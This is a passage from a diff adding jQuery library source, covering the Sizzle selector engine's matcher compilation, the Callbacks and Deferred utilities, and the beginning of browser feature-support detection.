+				soFar = soFar.slice( match[0].length ) || soFar;
+			}
+			groups.push( tokens = [] );
+		}
+
+		matched = false;
+
+		// Combinators
+		if ( (match = rcombinators.exec( soFar )) ) {
+			matched = match.shift();
+			tokens.push({
+				value: matched,
+				// Cast descendant combinators to space
+				type: match[0].replace( rtrim, " " )
+			});
+			soFar = soFar.slice( matched.length );
+		}
+
+		// Filters
+		for ( type in Expr.filter ) {
+			if ( (match = matchExpr[ type ].exec( soFar )) && (!preFilters[ type ] ||
+				(match = preFilters[ type ]( match ))) ) {
+				matched = match.shift();
+				tokens.push({
+					value: matched,
+					type: type,
+					matches: match
+				});
+				soFar = soFar.slice( matched.length );
+			}
+		}
+
+		if ( !matched ) {
+			break;
+		}
+	}
+
+	// Return the length of the invalid excess
+	// if we're just parsing
+	// Otherwise, throw an error or return tokens
+	return parseOnly ?
+		soFar.length :
+		soFar ?
+			Sizzle.error( selector ) :
+			// Cache the tokens
+			tokenCache( selector, groups ).slice( 0 );
+}
+
+function toSelector( tokens ) {
+	var i = 0,
+		len = tokens.length,
+		selector = "";
+	for ( ; i < len; i++ ) {
+		selector += tokens[i].value;
+	}
+	return selector;
+}
+
+function addCombinator( matcher, combinator, base ) {
+	var dir = combinator.dir,
+		checkNonElements = base && dir === "parentNode",
+		doneName = done++;
+
+	return combinator.first ?
+		// Check against closest ancestor/preceding element
+		function( elem, context, xml ) {
+			while ( (elem = elem[ dir ]) ) {
+				if ( elem.nodeType === 1 || checkNonElements ) {
+					return matcher( elem, context, xml );
+				}
+			}
+		} :
+
+		// Check against all ancestor/preceding elements
+		function( elem, context, xml ) {
+			var data, cache, outerCache,
+				dirkey = dirruns + " " + doneName;
+
+			// We can't set arbitrary data on XML nodes, so they don't benefit from dir caching
+			if ( xml ) {
+				while ( (elem = elem[ dir ]) ) {
+					if ( elem.nodeType === 1 || checkNonElements ) {
+						if ( matcher( elem, context, xml ) ) {
+							return true;
+						}
+					}
+				}
+			} else {
+				while ( (elem = elem[ dir ]) ) {
+					if ( elem.nodeType === 1 || checkNonElements ) {
+						outerCache = elem[ expando ] || (elem[ expando ] = {});
+						if ( (cache = outerCache[ dir ]) && cache[0] === dirkey ) {
+							if ( (data = cache[1]) === true || data === cachedruns ) {
+								return data === true;
+							}
+						} else {
+							cache = outerCache[ dir ] = [ dirkey ];
+							cache[1] = matcher( elem, context, xml ) || cachedruns;
+							if ( cache[1] === true ) {
+								return true;
+							}
+						}
+					}
+				}
+			}
+		};
+}
+
+function elementMatcher( matchers ) {
+	return matchers.length > 1 ?
+		function( elem, context, xml ) {
+			var i = matchers.length;
+			while ( i-- ) {
+				if ( !matchers[i]( elem, context, xml ) ) {
+					return false;
+				}
+			}
+			return true;
+		} :
+		matchers[0];
+}
+
+function condense( unmatched, map, filter, context, xml ) {
+	var elem,
+		newUnmatched = [],
+		i = 0,
+		len = unmatched.length,
+		mapped = map != null;
+
+	for ( ; i < len; i++ ) {
+		if ( (elem = unmatched[i]) ) {
+			if ( !filter || filter( elem, context, xml ) ) {
+				newUnmatched.push( elem );
+				if ( mapped ) {
+					map.push( i );
+				}
+			}
+		}
+	}
+
+	return newUnmatched;
+}
+
+function setMatcher( preFilter, selector, matcher, postFilter, postFinder, postSelector ) {
+	if ( postFilter && !postFilter[ expando ] ) {
+		postFilter = setMatcher( postFilter );
+	}
+	if ( postFinder && !postFinder[ expando ] ) {
+		postFinder = setMatcher( postFinder, postSelector );
+	}
+	return markFunction(function( seed, results, context, xml ) {
+		var temp, i, elem,
+			preMap = [],
+			postMap = [],
+			preexisting = results.length,
+
+			// Get initial elements from seed or context
+			elems = seed || multipleContexts( selector || "*", context.nodeType ? [ context ] : context, [] ),
+
+			// Prefilter to get matcher input, preserving a map for seed-results synchronization
+			matcherIn = preFilter && ( seed || !selector ) ?
+				condense( elems, preMap, preFilter, context, xml ) :
+				elems,
+
+			matcherOut = matcher ?
+				// If we have a postFinder, or filtered seed, or non-seed postFilter or preexisting results,
+				postFinder || ( seed ? preFilter : preexisting || postFilter ) ?
+
+					// ...intermediate processing is necessary
+					[] :
+
+					// ...otherwise use results directly
+					results :
+				matcherIn;
+
+		// Find primary matches
+		if ( matcher ) {
+			matcher( matcherIn, matcherOut, context, xml );
+		}
+
+		// Apply postFilter
+		if ( postFilter ) {
+			temp = condense( matcherOut, postMap );
+			postFilter( temp, [], context, xml );
+
+			// Un-match failing elements by moving them back to matcherIn
+			i = temp.length;
+			while ( i-- ) {
+				if ( (elem = temp[i]) ) {
+					matcherOut[ postMap[i] ] = !(matcherIn[ postMap[i] ] = elem);
+				}
+			}
+		}
+
+		if ( seed ) {
+			if ( postFinder || preFilter ) {
+				if ( postFinder ) {
+					// Get the final matcherOut by condensing this intermediate into postFinder contexts
+					temp = [];
+					i = matcherOut.length;
+					while ( i-- ) {
+						if ( (elem = matcherOut[i]) ) {
+							// Restore matcherIn since elem is not yet a final match
+							temp.push( (matcherIn[i] = elem) );
+						}
+					}
+					postFinder( null, (matcherOut = []), temp, xml );
+				}
+
+				// Move matched elements from seed to results to keep them synchronized
+				i = matcherOut.length;
+				while ( i-- ) {
+					if ( (elem = matcherOut[i]) &&
+						(temp = postFinder ? indexOf.call( seed, elem ) : preMap[i]) > -1 ) {
+
+						seed[temp] = !(results[temp] = elem);
+					}
+				}
+			}
+
+		// Add elements to results, through postFinder if defined
+		} else {
+			matcherOut = condense(
+				matcherOut === results ?
+					matcherOut.splice( preexisting, matcherOut.length ) :
+					matcherOut
+			);
+			if ( postFinder ) {
+				postFinder( null, results, matcherOut, xml );
+			} else {
+				push.apply( results, matcherOut );
+			}
+		}
+	});
+}
+
+function matcherFromTokens( tokens ) {
+	var checkContext, matcher, j,
+		len = tokens.length,
+		leadingRelative = Expr.relative[ tokens[0].type ],
+		implicitRelative = leadingRelative || Expr.relative[" "],
+		i = leadingRelative ? 1 : 0,
+
+		// The foundational matcher ensures that elements are reachable from top-level context(s)
+		matchContext = addCombinator( function( elem ) {
+			return elem === checkContext;
+		}, implicitRelative, true ),
+		matchAnyContext = addCombinator( function( elem ) {
+			return indexOf.call( checkContext, elem ) > -1;
+		}, implicitRelative, true ),
+		matchers = [ function( elem, context, xml ) {
+			return ( !leadingRelative && ( xml || context !== outermostContext ) ) || (
+				(checkContext = context).nodeType ?
+					matchContext( elem, context, xml ) :
+					matchAnyContext( elem, context, xml ) );
+		} ];
+
+	for ( ; i < len; i++ ) {
+		if ( (matcher = Expr.relative[ tokens[i].type ]) ) {
+			matchers = [ addCombinator(elementMatcher( matchers ), matcher) ];
+		} else {
+			matcher = Expr.filter[ tokens[i].type ].apply( null, tokens[i].matches );
+
+			// Return special upon seeing a positional matcher
+			if ( matcher[ expando ] ) {
+				// Find the next relative operator (if any) for proper handling
+				j = ++i;
+				for ( ; j < len; j++ ) {
+					if ( Expr.relative[ tokens[j].type ] ) {
+						break;
+					}
+				}
+				return setMatcher(
+					i > 1 && elementMatcher( matchers ),
+					i > 1 && toSelector(
+						// If the preceding token was a descendant combinator, insert an implicit any-element `*`
+						tokens.slice( 0, i - 1 ).concat({ value: tokens[ i - 2 ].type === " " ? "*" : "" })
+					).replace( rtrim, "$1" ),
+					matcher,
+					i < j && matcherFromTokens( tokens.slice( i, j ) ),
+					j < len && matcherFromTokens( (tokens = tokens.slice( j )) ),
+					j < len && toSelector( tokens )
+				);
+			}
+			matchers.push( matcher );
+		}
+	}
+
+	return elementMatcher( matchers );
+}
+
+function matcherFromGroupMatchers( elementMatchers, setMatchers ) {
+	// A counter to specify which element is currently being matched
+	var matcherCachedRuns = 0,
+		bySet = setMatchers.length > 0,
+		byElement = elementMatchers.length > 0,
+		superMatcher = function( seed, context, xml, results, expandContext ) {
+			var elem, j, matcher,
+				setMatched = [],
+				matchedCount = 0,
+				i = "0",
+				unmatched = seed && [],
+				outermost = expandContext != null,
+				contextBackup = outermostContext,
+				// We must always have either seed elements or context
+				elems = seed || byElement && Expr.find["TAG"]( "*", expandContext && context.parentNode || context ),
+				// Use integer dirruns iff this is the outermost matcher
+				dirrunsUnique = (dirruns += contextBackup == null ? 1 : Math.random() || 0.1);
+
+			if ( outermost ) {
+				outermostContext = context !== document && context;
+				cachedruns = matcherCachedRuns;
+			}
+
+			// Add elements passing elementMatchers directly to results
+			// Keep `i` a string if there are no elements so `matchedCount` will be "00" below
+			for ( ; (elem = elems[i]) != null; i++ ) {
+				if ( byElement && elem ) {
+					j = 0;
+					while ( (matcher = elementMatchers[j++]) ) {
+						if ( matcher( elem, context, xml ) ) {
+							results.push( elem );
+							break;
+						}
+					}
+					if ( outermost ) {
+						dirruns = dirrunsUnique;
+						cachedruns = ++matcherCachedRuns;
+					}
+				}
+
+				// Track unmatched elements for set filters
+				if ( bySet ) {
+					// They will have gone through all possible matchers
+					if ( (elem = !matcher && elem) ) {
+						matchedCount--;
+					}
+
+					// Lengthen the array for every element, matched or not
+					if ( seed ) {
+						unmatched.push( elem );
+					}
+				}
+			}
+
+			// Apply set filters to unmatched elements
+			matchedCount += i;
+			if ( bySet && i !== matchedCount ) {
+				j = 0;
+				while ( (matcher = setMatchers[j++]) ) {
+					matcher( unmatched, setMatched, context, xml );
+				}
+
+				if ( seed ) {
+					// Reintegrate element matches to eliminate the need for sorting
+					if ( matchedCount > 0 ) {
+						while ( i-- ) {
+							if ( !(unmatched[i] || setMatched[i]) ) {
+								setMatched[i] = pop.call( results );
+							}
+						}
+					}
+
+					// Discard index placeholder values to get only actual matches
+					setMatched = condense( setMatched );
+				}
+
+				// Add matches to results
+				push.apply( results, setMatched );
+
+				// Seedless set matches succeeding multiple successful matchers stipulate sorting
+				if ( outermost && !seed && setMatched.length > 0 &&
+					( matchedCount + setMatchers.length ) > 1 ) {
+
+					Sizzle.uniqueSort( results );
+				}
+			}
+
+			// Override manipulation of globals by nested matchers
+			if ( outermost ) {
+				dirruns = dirrunsUnique;
+				outermostContext = contextBackup;
+			}
+
+			return unmatched;
+		};
+
+	return bySet ?
+		markFunction( superMatcher ) :
+		superMatcher;
+}
+
+compile = Sizzle.compile = function( selector, group /* Internal Use Only */ ) {
+	var i,
+		setMatchers = [],
+		elementMatchers = [],
+		cached = compilerCache[ selector + " " ];
+
+	if ( !cached ) {
+		// Generate a function of recursive functions that can be used to check each element
+		if ( !group ) {
+			group = tokenize( selector );
+		}
+		i = group.length;
+		while ( i-- ) {
+			cached = matcherFromTokens( group[i] );
+			if ( cached[ expando ] ) {
+				setMatchers.push( cached );
+			} else {
+				elementMatchers.push( cached );
+			}
+		}
+
+		// Cache the compiled function
+		cached = compilerCache( selector, matcherFromGroupMatchers( elementMatchers, setMatchers ) );
+	}
+	return cached;
+};
+
+function multipleContexts( selector, contexts, results ) {
+	var i = 0,
+		len = contexts.length;
+	for ( ; i < len; i++ ) {
+		Sizzle( selector, contexts[i], results );
+	}
+	return results;
+}
+
+function select( selector, context, results, seed ) {
+	var i, tokens, token, type, find,
+		match = tokenize( selector );
+
+	if ( !seed ) {
+		// Try to minimize operations if there is only one group
+		if ( match.length === 1 ) {
+
+			// Take a shortcut and set the context if the root selector is an ID
+			tokens = match[0] = match[0].slice( 0 );
+			if ( tokens.length > 2 && (token = tokens[0]).type === "ID" &&
+					support.getById && context.nodeType === 9 && documentIsHTML &&
+					Expr.relative[ tokens[1].type ] ) {
+
+				context = ( Expr.find["ID"]( token.matches[0].replace(runescape, funescape), context ) || [] )[0];
+				if ( !context ) {
+					return results;
+				}
+				selector = selector.slice( tokens.shift().value.length );
+			}
+
+			// Fetch a seed set for right-to-left matching
+			i = matchExpr["needsContext"].test( selector ) ? 0 : tokens.length;
+			while ( i-- ) {
+				token = tokens[i];
+
+				// Abort if we hit a combinator
+				if ( Expr.relative[ (type = token.type) ] ) {
+					break;
+				}
+				if ( (find = Expr.find[ type ]) ) {
+					// Search, expanding context for leading sibling combinators
+					if ( (seed = find(
+						token.matches[0].replace( runescape, funescape ),
+						rsibling.test( tokens[0].type ) && context.parentNode || context
+					)) ) {
+
+						// If seed is empty or no tokens remain, we can return early
+						tokens.splice( i, 1 );
+						selector = seed.length && toSelector( tokens );
+						if ( !selector ) {
+							push.apply( results, seed );
+							return results;
+						}
+
+						break;
+					}
+				}
+			}
+		}
+	}
+
+	// Compile and execute a filtering function
+	// Provide `match` to avoid retokenization if we modified the selector above
+	compile( selector, match )(
+		seed,
+		context,
+		!documentIsHTML,
+		results,
+		rsibling.test( selector )
+	);
+	return results;
+}
+
+// One-time assignments
+
+// Sort stability
+support.sortStable = expando.split("").sort( sortOrder ).join("") === expando;
+
+// Support: Chrome<14
+// Always assume duplicates if they aren't passed to the comparison function
+support.detectDuplicates = hasDuplicate;
+
+// Initialize against the default document
+setDocument();
+
+// Support: Webkit<537.32 - Safari 6.0.3/Chrome 25 (fixed in Chrome 27)
+// Detached nodes confoundingly follow *each other*
+support.sortDetached = assert(function( div1 ) {
+	// Should return 1, but returns 4 (following)
+	return div1.compareDocumentPosition( document.createElement("div") ) & 1;
+});
+
+// Support: IE<8
+// Prevent attribute/property "interpolation"
+// http://msdn.microsoft.com/en-us/library/ms536429%28VS.85%29.aspx
+if ( !assert(function( div ) {
+	div.innerHTML = "<a href='#'></a>";
+	return div.firstChild.getAttribute("href") === "#" ;
+}) ) {
+	addHandle( "type|href|height|width", function( elem, name, isXML ) {
+		if ( !isXML ) {
+			return elem.getAttribute( name, name.toLowerCase() === "type" ? 1 : 2 );
+		}
+	});
+}
+
+// Support: IE<9
+// Use defaultValue in place of getAttribute("value")
+if ( !support.attributes || !assert(function( div ) {
+	div.innerHTML = "<input/>";
+	div.firstChild.setAttribute( "value", "" );
+	return div.firstChild.getAttribute( "value" ) === "";
+}) ) {
+	addHandle( "value", function( elem, name, isXML ) {
+		if ( !isXML && elem.nodeName.toLowerCase() === "input" ) {
+			return elem.defaultValue;
+		}
+	});
+}
+
+// Support: IE<9
+// Use getAttributeNode to fetch booleans when getAttribute lies
+if ( !assert(function( div ) {
+	return div.getAttribute("disabled") == null;
+}) ) {
+	addHandle( booleans, function( elem, name, isXML ) {
+		var val;
+		if ( !isXML ) {
+			return (val = elem.getAttributeNode( name )) && val.specified ?
+				val.value :
+				elem[ name ] === true ? name.toLowerCase() : null;
+		}
+	});
+}
+
+jQuery.find = Sizzle;
+jQuery.expr = Sizzle.selectors;
+jQuery.expr[":"] = jQuery.expr.pseudos;
+jQuery.unique = Sizzle.uniqueSort;
+jQuery.text = Sizzle.getText;
+jQuery.isXMLDoc = Sizzle.isXML;
+jQuery.contains = Sizzle.contains;
+
+
+})( window );
+// String to Object options format cache
+var optionsCache = {};
+
+// Convert String-formatted options into Object-formatted ones and store in cache
+function createOptions( options ) {
+	var object = optionsCache[ options ] = {};
+	jQuery.each( options.match( core_rnotwhite ) || [], function( _, flag ) {
+		object[ flag ] = true;
+	});
+	return object;
+}
+
+/*
+ * Create a callback list using the following parameters:
+ *
+ *	options: an optional list of space-separated options that will change how
+ *			the callback list behaves or a more traditional option object
+ *
+ * By default a callback list will act like an event callback list and can be
+ * "fired" multiple times.
+ *
+ * Possible options:
+ *
+ *	once:			will ensure the callback list can only be fired once (like a Deferred)
+ *
+ *	memory:			will keep track of previous values and will call any callback added
+ *					after the list has been fired right away with the latest "memorized"
+ *					values (like a Deferred)
+ *
+ *	unique:			will ensure a callback can only be added once (no duplicate in the list)
+ *
+ *	stopOnFalse:	interrupt callings when a callback returns false
+ *
+ */
+jQuery.Callbacks = function( options ) {
+
+	// Convert options from String-formatted to Object-formatted if needed
+	// (we check in cache first)
+	options = typeof options === "string" ?
+		( optionsCache[ options ] || createOptions( options ) ) :
+		jQuery.extend( {}, options );
+
+	var // Flag to know if list is currently firing
+		firing,
+		// Last fire value (for non-forgettable lists)
+		memory,
+		// Flag to know if list was already fired
+		fired,
+		// End of the loop when firing
+		firingLength,
+		// Index of currently firing callback (modified by remove if needed)
+		firingIndex,
+		// First callback to fire (used internally by add and fireWith)
+		firingStart,
+		// Actual callback list
+		list = [],
+		// Stack of fire calls for repeatable lists
+		stack = !options.once && [],
+		// Fire callbacks
+		fire = function( data ) {
+			memory = options.memory && data;
+			fired = true;
+			firingIndex = firingStart || 0;
+			firingStart = 0;
+			firingLength = list.length;
+			firing = true;
+			for ( ; list && firingIndex < firingLength; firingIndex++ ) {
+				if ( list[ firingIndex ].apply( data[ 0 ], data[ 1 ] ) === false && options.stopOnFalse ) {
+					memory = false; // To prevent further calls using add
+					break;
+				}
+			}
+			firing = false;
+			if ( list ) {
+				if ( stack ) {
+					if ( stack.length ) {
+						fire( stack.shift() );
+					}
+				} else if ( memory ) {
+					list = [];
+				} else {
+					self.disable();
+				}
+			}
+		},
+		// Actual Callbacks object
+		self = {
+			// Add a callback or a collection of callbacks to the list
+			add: function() {
+				if ( list ) {
+					// First, we save the current length
+					var start = list.length;
+					(function add( args ) {
+						jQuery.each( args, function( _, arg ) {
+							var type = jQuery.type( arg );
+							if ( type === "function" ) {
+								if ( !options.unique || !self.has( arg ) ) {
+									list.push( arg );
+								}
+							} else if ( arg && arg.length && type !== "string" ) {
+								// Inspect recursively
+								add( arg );
+							}
+						});
+					})( arguments );
+					// Do we need to add the callbacks to the
+					// current firing batch?
+					if ( firing ) {
+						firingLength = list.length;
+					// With memory, if we're not firing then
+					// we should call right away
+					} else if ( memory ) {
+						firingStart = start;
+						fire( memory );
+					}
+				}
+				return this;
+			},
+			// Remove a callback from the list
+			remove: function() {
+				if ( list ) {
+					jQuery.each( arguments, function( _, arg ) {
+						var index;
+						while( ( index = jQuery.inArray( arg, list, index ) ) > -1 ) {
+							list.splice( index, 1 );
+							// Handle firing indexes
+							if ( firing ) {
+								if ( index <= firingLength ) {
+									firingLength--;
+								}
+								if ( index <= firingIndex ) {
+									firingIndex--;
+								}
+							}
+						}
+					});
+				}
+				return this;
+			},
+			// Check if a given callback is in the list.
+			// If no argument is given, return whether or not list has callbacks attached.
+			has: function( fn ) {
+				return fn ? jQuery.inArray( fn, list ) > -1 : !!( list && list.length );
+			},
+			// Remove all callbacks from the list
+			empty: function() {
+				list = [];
+				firingLength = 0;
+				return this;
+			},
+			// Have the list do nothing anymore
+			disable: function() {
+				list = stack = memory = undefined;
+				return this;
+			},
+			// Is it disabled?
+			disabled: function() {
+				return !list;
+			},
+			// Lock the list in its current state
+			lock: function() {
+				stack = undefined;
+				if ( !memory ) {
+					self.disable();
+				}
+				return this;
+			},
+			// Is it locked?
+			locked: function() {
+				return !stack;
+			},
+			// Call all callbacks with the given context and arguments
+			fireWith: function( context, args ) {
+				if ( list && ( !fired || stack ) ) {
+					args = args || [];
+					args = [ context, args.slice ? args.slice() : args ];
+					if ( firing ) {
+						stack.push( args );
+					} else {
+						fire( args );
+					}
+				}
+				return this;
+			},
+			// Call all the callbacks with the given arguments
+			fire: function() {
+				self.fireWith( this, arguments );
+				return this;
+			},
+			// To know if the callbacks have already been called at least once
+			fired: function() {
+				return !!fired;
+			}
+		};
+
+	return self;
+};
+jQuery.extend({
+
+	Deferred: function( func ) {
+		var tuples = [
+				// action, add listener, listener list, final state
+				[ "resolve", "done", jQuery.Callbacks("once memory"), "resolved" ],
+				[ "reject", "fail", jQuery.Callbacks("once memory"), "rejected" ],
+				[ "notify", "progress", jQuery.Callbacks("memory") ]
+			],
+			state = "pending",
+			promise = {
+				state: function() {
+					return state;
+				},
+				always: function() {
+					deferred.done( arguments ).fail( arguments );
+					return this;
+				},
+				then: function( /* fnDone, fnFail, fnProgress */ ) {
+					var fns = arguments;
+					return jQuery.Deferred(function( newDefer ) {
+						jQuery.each( tuples, function( i, tuple ) {
+							var action = tuple[ 0 ],
+								fn = jQuery.isFunction( fns[ i ] ) && fns[ i ];
+							// deferred[ done | fail | progress ] for forwarding actions to newDefer
+							deferred[ tuple[1] ](function() {
+								var returned = fn && fn.apply( this, arguments );
+								if ( returned && jQuery.isFunction( returned.promise ) ) {
+									returned.promise()
+										.done( newDefer.resolve )
+										.fail( newDefer.reject )
+										.progress( newDefer.notify );
+								} else {
+									newDefer[ action + "With" ]( this === promise ? newDefer.promise() : this, fn ? [ returned ] : arguments );
+								}
+							});
+						});
+						fns = null;
+					}).promise();
+				},
+				// Get a promise for this deferred
+				// If obj is provided, the promise aspect is added to the object
+				promise: function( obj ) {
+					return obj != null ? jQuery.extend( obj, promise ) : promise;
+				}
+			},
+			deferred = {};
+
+		// Keep pipe for back-compat
+		promise.pipe = promise.then;
+
+		// Add list-specific methods
+		jQuery.each( tuples, function( i, tuple ) {
+			var list = tuple[ 2 ],
+				stateString = tuple[ 3 ];
+
+			// promise[ done | fail | progress ] = list.add
+			promise[ tuple[1] ] = list.add;
+
+			// Handle state
+			if ( stateString ) {
+				list.add(function() {
+					// state = [ resolved | rejected ]
+					state = stateString;
+
+				// [ reject_list | resolve_list ].disable; progress_list.lock
+				}, tuples[ i ^ 1 ][ 2 ].disable, tuples[ 2 ][ 2 ].lock );
+			}
+
+			// deferred[ resolve | reject | notify ]
+			deferred[ tuple[0] ] = function() {
+				deferred[ tuple[0] + "With" ]( this === deferred ? promise : this, arguments );
+				return this;
+			};
+			deferred[ tuple[0] + "With" ] = list.fireWith;
+		});
+
+		// Make the deferred a promise
+		promise.promise( deferred );
+
+		// Call given func if any
+		if ( func ) {
+			func.call( deferred, deferred );
+		}
+
+		// All done!
+		return deferred;
+	},
+
+	// Deferred helper
+	when: function( subordinate /* , ..., subordinateN */ ) {
+		var i = 0,
+			resolveValues = core_slice.call( arguments ),
+			length = resolveValues.length,
+
+			// the count of uncompleted subordinates
+			remaining = length !== 1 || ( subordinate && jQuery.isFunction( subordinate.promise ) ) ? length : 0,
+
+			// the master Deferred. If resolveValues consist of only a single Deferred, just use that.
+			deferred = remaining === 1 ? subordinate : jQuery.Deferred(),
+
+			// Update function for both resolve and progress values
+			updateFunc = function( i, contexts, values ) {
+				return function( value ) {
+					contexts[ i ] = this;
+					values[ i ] = arguments.length > 1 ? core_slice.call( arguments ) : value;
+					if( values === progressValues ) {
+						deferred.notifyWith( contexts, values );
+					} else if ( !( --remaining ) ) {
+						deferred.resolveWith( contexts, values );
+					}
+				};
+			},
+
+			progressValues, progressContexts, resolveContexts;
+
+		// add listeners to Deferred subordinates; treat others as resolved
+		if ( length > 1 ) {
+			progressValues = new Array( length );
+			progressContexts = new Array( length );
+			resolveContexts = new Array( length );
+			for ( ; i < length; i++ ) {
+				if ( resolveValues[ i ] && jQuery.isFunction( resolveValues[ i ].promise ) ) {
+					resolveValues[ i ].promise()
+						.done( updateFunc( i, resolveContexts, resolveValues ) )
+						.fail( deferred.reject )
+						.progress( updateFunc( i, progressContexts, progressValues ) );
+				} else {
+					--remaining;
+				}
+			}
+		}
+
+		// if we're not waiting on anything, resolve the master
+		if ( !remaining ) {
+			deferred.resolveWith( resolveContexts, resolveValues );
+		}
+
+		return deferred.promise();
+	}
+});
+jQuery.support = (function( support ) {
+
+	var all, a, input, select, fragment, opt, eventName, isSupported, i,
+		div = document.createElement("div");
+
+	// Setup
+	div.setAttribute( "className", "t" );
+	div.innerHTML = "  <link/><table></table><a href='/a'>a</a><input type='checkbox'/>";
+
+	// Finish early in limited (non-browser) environments
+	all = div.getElementsByTagName("*") || [];
+	a = div.getElementsByTagName("a")[ 0 ];
+	if ( !a || !a.style || !all.length ) {
+		return support;
+	}
+
+	// First batch of tests
+	select = document.createElement("select");
+	opt = select.appendChild( document.createElement("option") );
+	input = div.getElementsByTagName("input")[ 0 ];
+
+	a.style.cssText = "top:1px;float:left;opacity:.5";
+
+	// Test setAttribute on camelCase class. If it works, we need attrFixes when doing get/setAttribute (ie6/7)
+	support.getSetAttribute = div.className !== "t";
+
+	// IE strips leading whitespace when .innerHTML is used
+	support.leadingWhitespace = div.firstChild.nodeType === 3;
+
+	// Make sure that tbody elements aren't automatically inserted
+	// IE will insert them into empty tables
+	support.tbody = !div.getElementsByTagName("tbody").length;
+
+	// Make sure that link elements get serialized correctly by innerHTML
+	// This requires a wrapper element in IE
+	support.htmlSerialize = !!div.getElementsByTagName("link").length;
+
+	// Get the style information from getAttribute
+	// (IE uses .cssText instead)
+	support.style = /top/.test( a.getAttribute("style") );
+
+	// Make sure that URLs aren't manipulated
+	// (IE normalizes it by default)
+	support.hrefNormalized = a.getAttribute("href") === "/a";
+
+	// Make sure that element opacity exists
+	// (IE uses filter instead)
+	// Use a regex to work around a WebKit issue. See #5145
+	support.opacity = /^0.5/.test( a.style.opacity );
+
+	// Verify style float existence
+	// (IE uses styleFloat instead of cssFloat)
+	support.cssFloat = !!a.style.cssFloat;
+
+	// Check the default checkbox/radio value ("" on WebKit; "on" elsewhere)
+	support.checkOn = !!input.value;
+
+	// Make sure that a selected-by-default option has a working selected property.
+	// (WebKit defaults to false instead of true, IE too, if it's in an optgroup)
+	support.optSelected = opt.selected;
+
+	// Tests for enctype support on a form (#6743)
+	support.enctype = !!document.createElement("form").enctype;
+
+	// Makes sure cloning an html5 element does not cause problems
+	// Where outerHTML is undefined, this still works
+	support.html5Clone = document.createElement("nav").cloneNode( true ).outerHTML !== "<:nav></:nav>";
+
+	// Will be defined later
+	support.inlineBlockNeedsLayout = false;
+	support.shrinkWrapBlocks = false;
+	support.pixelPosition = false;
+	support.deleteExpando = true;
+	support.noCloneEvent = true;
+	support.reliableMarginRight = true;
+	support.boxSizingReliable = true;
+
+	// Make sure checked status is properly cloned
+	input.checked = true;
+	support.noCloneChecked = input.cloneNode( true ).checked;
+
+	// Make sure that the options inside disabled selects aren't marked as disabled
+	// (WebKit marks them as disabled)
+	select.disabled = true;
+	support.optDisabled = !opt.disabled;
+
+	// Support: IE<9
+	try {
+		delete div.test;
+	} catch( e ) {
+		support.deleteExpando = false;
+	}
+
+	// Check if we can trust getAttribute("value")
+	input = document.createElement("input");
+	input.setAttribute( "value", "" );
+	support.input = input.getAttribute( "value" ) === "";
+
+	// Check if an input maintains its value after becoming a radio
+	input.value = "t";
+	input.setAttribute( "type", "radio" );
+	support.radioValue = input.value === "t";
+
+	// #11217 - WebKit loses check when the name is after the checked attribute
+	input.setAttribute( "checked", "t" );
+	input.setAttribute( "name", "t" );
+
+	fragment = document.createDocumentFragment();
+	fragment.appendChild( input );
+
+	// Check if a disconnected checkbox will retain its checked
+	// value of true after appended to the DOM (IE6/7)
+	support.appendChecked = input.checked;
+
+	// WebKit doesn't clone checked state correctly in fragments
+	support.checkClone = fragment.cloneNode( true ).cloneNode( true ).lastChild.checked;
+
+	// Support: IE<9
+	// Opera does not clone events (and typeof div.attachEvent === undefined).
+	// IE9-10 clones events bound via attachEvent, but they don't trigger with .click()
+	if ( div.attachEvent ) {
+		div.attachEvent( "onclick", function() {
+			support.noCloneEvent = false;
+		});
+
+		div.cloneNode( true ).click();
+	}
+
+	// Support: IE<9 (lack submit/change bubble), Firefox 17+ (lack focusin event)
+	// Beware of CSP restrictions (https://developer.mozilla.org/en/Security/CSP)
+	for ( i in { submit: true, change: true, focusin: true }) {
+		div.setAttribute( eventName = "on" + i, "t" );
+
+		support[ i + "Bubbles" ] = eventName in window || div.attributes[ eventName ].expando === false;
+	}
+
+	div.style.backgroundClip = "content-box";
+	div.cloneNode( true ).style.backgroundClip = "";
+	support.clearCloneStyle = div.style.backgroundClip === "content-box";
+
+	// Support: IE<9
+	// Iteration over object's inherited properties before its own.
+	for ( i in jQuery( support ) ) {
+		break;
+	}
+	support.ownLast = i !== "0";
+
+	// Run tests that need a body at doc ready
+	jQuery(function() {
+		var container, marginDiv, tds,
+			divReset = "padding:0;margin:0;border:0;display:block;box-sizing:content-box;-moz-box-sizing:content-box;-webkit-box-sizing:content-box;",
+			body = document.getElementsByTagName("body")[0];
+
+		if ( !body ) {
+			// Return for frameset docs that don't have a body
+			return;
+		}
+
+		container = document.createElement("div");
+		container.style.cssText = "border:0;width:0;height:0;position:absolute;top:0;left:-9999px;margin-top:1px";
+
+		body.appendChild( container ).appendChild( div );
+
+		// Support: IE8
+		// Check if table cells still have offsetWidth/Height when they are set
+		// to display:none and there are still other visible table cells in a
+		// table row; if so, offsetWidth/Height are not reliable for use when
+		// determining if an element has been hidden directly using
+		// display:none (it is still safe to use offsets if a parent element is
+		// hidden; don safety goggles and see bug #4512 for more information).
+		div.innerHTML = "<table><tr><td></td><td>t</td></tr></table>";
+		tds = div.getElementsByTagName("td");
+		tds[ 0 ].style.cssText = "padding:0;margin:0;border:0;display:none";
+		isSupported = ( tds[ 0 ].offsetHeight === 0 );
+
+		tds[ 0 ].style.display = "";
+		tds[ 1 ].style.display = "none";
+
+		// Support: IE8
+		// Check if empty table cells still have offsetWidth/Height
+		support.reliableHiddenOffsets = isSupported && ( tds[ 0 ].offsetHeight === 0 );
+
+		// Check box-sizing and margin behavior.
+		div.innerHTML = "";
+		div.style.cssText = "box-sizing:border-box;-moz-box-sizing:border-box;-webkit-box-sizing:border-box;padding:1px;border:1px;display:block;width:4px;margin-top:1%;position:absolute;top:1%;";
+
+		// Workaround failing boxSizing test due to offsetWidth returning wrong value
+		// with some non-1 values of body zoom, ticket #13543
+		jQuery.swap( body, body.style.zoom != null ? { zoom: 1 } : {}, function() {
+			support.boxSizing = div.offsetWidth === 4;
+		});
+
+		// Use window.getComputedStyle because jsdom on node.js will break without it.
+		if ( window.getComputedStyle ) {
+			support.pixelPosition = ( window.getComputedStyle( div, null ) || {} ).top !== "1%";
+			support.boxSizingReliable = ( window.getComputedStyle( div, null ) || { width: "4px" } ).width === "4px";
+
+			// Check if div with explicit width and no margin-right incorrectly
+			// gets computed margin-right based on width of container. (#3333)
+			// Fails in WebKit before Feb 2011 nightlies
+			// WebKit Bug 13343 - getComputedStyle returns wrong value for margin-right
+			marginDiv = div.appendChild( document.createElement("div") );
+			marginDiv.style.cssText = div.style.cssText = divReset;
